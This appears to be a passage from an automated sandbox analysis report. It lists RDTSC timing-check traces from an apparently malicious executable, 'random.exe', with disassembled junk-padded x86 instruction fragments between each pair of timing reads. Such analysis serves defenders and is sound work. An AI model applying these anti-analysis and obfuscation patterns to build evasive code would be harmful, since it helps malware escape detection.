      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D936 second address: 116D946 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E164B2h 0x00000008 jc 00007FA8D8E164A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D946 second address: 116D96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FA8D8E1DCF6h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DAC1 second address: 116DAC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DAC7 second address: 116DACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DACB second address: 116DAF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FA8D8E164A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FA8D8E164B9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116DAF7 second address: 116DB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA8D8E1DCF6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116FE43 second address: 116FE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1174062 second address: 1174068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1174068 second address: 1174075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1174075 second address: 1174090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 117584C second address: 1175850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1175850 second address: 117585A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA8D8E1DCF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 117585A second address: 1175864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1175864 second address: 1175870 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA8D8E1DCF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1175870 second address: 117587A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 117784E second address: 1177858 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08DA second address: 55B08EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 776AE624h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08EE second address: 55B08F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08F2 second address: 55B08F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B08F8 second address: 55B096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FA8D8E1DCFEh 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov bl, al 0x00000018 popad 0x00000019 mov edx, 237B7F38h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FA8D8E1DCFEh 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 call 00007FA8D8E1DCFEh 0x0000002c pushad 0x0000002d popad 0x0000002e pop esi 0x0000002f movsx ebx, cx 0x00000032 popad 0x00000033 xchg eax, esi 0x00000034 jmp 00007FA8D8E1DD08h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B096E second address: 55B0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0972 second address: 55B0976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0976 second address: 55B097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B097C second address: 55B0992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD02h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0992 second address: 55B09CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FA8D8E164B7h 0x0000000e lea eax, dword ptr [ebp-04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA8D8E164B5h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B09CC second address: 55B09FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FA8D8E1DD02h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E1DCFEh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B09FB second address: 55B0A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164AEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A0D second address: 55B0A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A11 second address: 55B0A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FA8D8E164B7h 0x0000000e push dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA8D8E164B5h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A7A second address: 55B0A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0A80 second address: 55B0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0AD5 second address: 55B0AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0AD9 second address: 55B0ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0ADF second address: 55B0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1F6A9BB8h 0x00000008 call 00007FA8D8E1DD01h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B03 second address: 55B0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B07 second address: 55B0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55B0B0D second address: 55A0016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FA8D8E164B6h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 xor ebx, ebx 0x0000001b test al, 01h 0x0000001d jne 00007FA8D8E164A7h 0x0000001f sub esp, 04h 0x00000022 mov dword ptr [esp], 0000000Dh 0x00000029 call 00007FA8DD4F7CB7h 0x0000002e mov edi, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 call 00007FA8D8E164ADh 0x00000038 pop ecx 0x00000039 push edx 0x0000003a pop ecx 0x0000003b popad 0x0000003c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0016 second address: 55A0027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edx, ecx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0027 second address: 55A0038 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 68047FB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cl, C0h 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0038 second address: 55A003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A003E second address: 55A0042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0042 second address: 55A0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA8D8E1DD05h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0062 second address: 55A0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0068 second address: 55A006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A006C second address: 55A0070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0070 second address: 55A0080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0080 second address: 55A0086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0086 second address: 55A008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A008B second address: 55A0107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA8D8E164AFh 0x0000000a sub eax, 637A845Eh 0x00000010 jmp 00007FA8D8E164B9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 2Ch 0x0000001c jmp 00007FA8D8E164AEh 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push ecx 0x00000024 mov eax, edx 0x00000026 pop edx 0x00000027 mov cl, 33h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FA8D8E164B0h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA8D8E164B7h 0x00000038 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0107 second address: 55A017D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FA8D8E1DCFEh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007FA8D8E1DD01h 0x00000016 mov edx, ecx 0x00000018 pop esi 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FA8D8E1DD08h 0x00000020 add ecx, 373D8108h 0x00000026 jmp 00007FA8D8E1DCFBh 0x0000002b popfd 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A017D second address: 55A0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164AEh 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0190 second address: 55A0195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A01B3 second address: 55A01B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A01B7 second address: 55A01BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A01BD second address: 55A0272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA8D8E164B7h 0x00000012 add cx, 74BEh 0x00000017 jmp 00007FA8D8E164B9h 0x0000001c popfd 0x0000001d mov si, 1A07h 0x00000021 popad 0x00000022 sub edi, edi 0x00000024 pushad 0x00000025 call 00007FA8D8E164B9h 0x0000002a pushfd 0x0000002b jmp 00007FA8D8E164B0h 0x00000030 or esi, 768C0018h 0x00000036 jmp 00007FA8D8E164ABh 0x0000003b popfd 0x0000003c pop ecx 0x0000003d movsx edx, si 0x00000040 popad 0x00000041 inc ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FA8D8E164B7h 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0272 second address: 55A02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FA8D8E1DD00h 0x0000000c sub si, 84D8h 0x00000011 jmp 00007FA8D8E1DCFBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test al, al 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA8D8E1DD05h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A035A second address: 55A035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A035E second address: 55A0362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0362 second address: 55A0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A03C4 second address: 55A045B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FA9497CBDA1h 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 pushfd 0x00000014 jmp 00007FA8D8E1DD09h 0x00000019 sub cx, 4226h 0x0000001e jmp 00007FA8D8E1DD01h 0x00000023 popfd 0x00000024 popad 0x00000025 js 00007FA8D8E1DD80h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FA8D8E1DD03h 0x00000034 or esi, 48DEC55Eh 0x0000003a jmp 00007FA8D8E1DD09h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A045B second address: 55A0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B3h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0472 second address: 55A0476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0476 second address: 55A04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f jmp 00007FA8D8E164ACh 0x00000014 popad 0x00000015 jne 00007FA9497C44AFh 0x0000001b pushad 0x0000001c push ecx 0x0000001d jmp 00007FA8D8E164ADh 0x00000022 pop eax 0x00000023 mov dx, 9594h 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA8D8E164B6h 0x00000032 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A04C8 second address: 55A0523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c pushad 0x0000000d mov al, CDh 0x0000000f jmp 00007FA8D8E1DD01h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007FA8D8E1DCFEh 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FA8D8E1DCFCh 0x00000025 xor cx, 7A08h 0x0000002a jmp 00007FA8D8E1DCFBh 0x0000002f popfd 0x00000030 mov edi, esi 0x00000032 popad 0x00000033 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0523 second address: 55A0537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B0h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0537 second address: 55A053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A053B second address: 55A0550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA8D8E164AAh 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0550 second address: 55A0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A0562 second address: 55A059B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FA8D8E164B6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164AEh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A059B second address: 55A05DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA8D8E1DD01h 0x00000009 sub esi, 3E457946h 0x0000000f jmp 00007FA8D8E1DD01h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007FA8D8E1DCFAh 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov esi, edi 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A063E second address: 55A068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, A576h 0x00000012 pushfd 0x00000013 jmp 00007FA8D8E164B7h 0x00000018 or ch, FFFFFFFEh 0x0000001b jmp 00007FA8D8E164B9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A068C second address: 55A06A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A06A9 second address: 55A06AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A06AD second address: 55A06B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A06B3 second address: 55A06C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B1h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A06C8 second address: 55A06CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 55A06CC second address: 5590C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9497C4427h 0x0000000e xor eax, eax 0x00000010 jmp 00007FA8D8DEFBDAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d cmp eax, 00000000h 0x00000020 setne cl 0x00000023 xor ebx, ebx 0x00000025 test cl, 00000001h 0x00000028 jne 00007FA8D8E164A7h 0x0000002a jmp 00007FA8D8E16664h 0x0000002f call 00007FA8DD4E86E2h 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007FA8D8E164AEh 0x0000003e mov dx, cx 0x00000041 popad 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C19 second address: 5590C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C1F second address: 5590C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C23 second address: 5590C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FA8D8E1DD07h 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C48 second address: 5590C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA8D8E164B5h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 5590C6D second address: 5590C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFCh 0x00000009 rdtsc
